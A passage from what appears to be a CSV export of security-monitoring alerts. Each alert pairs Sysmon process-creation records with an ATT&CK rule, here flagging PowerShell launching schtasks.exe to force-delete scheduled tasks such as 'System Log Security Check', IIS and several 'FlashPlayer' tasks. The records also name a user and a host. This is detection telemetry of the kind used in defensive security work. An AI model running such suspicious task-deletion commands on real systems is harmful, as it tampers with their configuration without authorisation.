14:18:32.230",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.339 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00102c911e00} +ProcessId: 3572 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.342433900Z"",""eventRecordID"":""2496"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.339\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00102c911e00}\r\nProcessId: 3572\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.339"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00102c911e00}"",""processId"":""3572"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.213",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.311 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105b8f1e00} +ProcessId: 1412 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.313550500Z"",""eventRecordID"":""2495"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.311\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105b8f1e00}\r\nProcessId: 1412\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.311"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00105b8f1e00}"",""processId"":""1412"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.198",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.290 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010978d1e00} +ProcessId: 1344 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.292753700Z"",""eventRecordID"":""2494"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.290\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010978d1e00}\r\nProcessId: 1344\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.290"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010978d1e00}"",""processId"":""1344"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.182",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.265 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105e8b1e00} +ProcessId: 5800 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.269056800Z"",""eventRecordID"":""2493"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.265\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105e8b1e00}\r\nProcessId: 5800\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.265"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00105e8b1e00}"",""processId"":""5800"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.151",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.235 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001053891e00} +ProcessId: 6864 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.238500300Z"",""eventRecordID"":""2492"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.235\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001053891e00}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.235"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001053891e00}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.134",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.206 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001078871e00} +ProcessId: 5196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.207791900Z"",""eventRecordID"":""2491"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.206\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001078871e00}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.206"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001078871e00}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.120",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.177 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010d4851e00} +ProcessId: 2532 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F 